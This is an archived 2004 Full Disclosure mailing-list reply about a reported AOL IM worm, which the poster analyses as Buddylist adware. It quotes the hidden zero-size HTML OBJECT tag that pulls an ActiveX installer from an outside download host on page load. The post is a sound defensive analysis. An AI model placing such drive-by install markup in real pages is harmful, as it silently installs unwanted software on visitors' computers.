Full Disclosure mailing list archives
SV: AOL IM Worm
From: "Peter Kruse" <kruse () krusesecurity dk>
Date: Wed, 11 Feb 2004 21:18:24 +0100
Hi, It´s a Buddylist Adware. The page uses codebase object to run the ActiveX component: <OBJECT ID="ShellInstaller" WIDTH=0 HEIGHT=0 CLASSID="CLSID:FDDCE9FF-1FC6-413c-80B1-37B101FDA1D4" CODEBASE="http://download.buddylinks.net/ShellInstaller.cab#Version=1,0, 0,001"> The cab file contains the files Shellinstaller.ini (2.119 bytes) and the binary ShellInstaller.ocx (81.920 bytes). The activex component hooks itself to IE and works as a typical adware component. No virus code here. McAfee has posted a writeup at this URL: http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=101007 Regards Peter Kruse _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- AOL IM Worm Justin Baldini (Feb 11)
- Re: AOL IM Worm Keith W. McCammon (Feb 11)
- SV: AOL IM Worm Peter Kruse (Feb 11)
- Re: AOL IM Worm Mary Landesman (Feb 11)
- Re: AOL IM Worm Exibar (Feb 11)
- Re: AOL IM Worm Mary Landesman (Feb 11)
- Re: AOL IM Worm Exibar (Feb 11)
- Re: AOL IM Worm Nick FitzGerald (Feb 11)
- <Possible follow-ups>
- RE: AOL IM Worm Turk, Anthony (Feb 11)
- Re: AOL IM Worm Keith W. McCammon (Feb 11)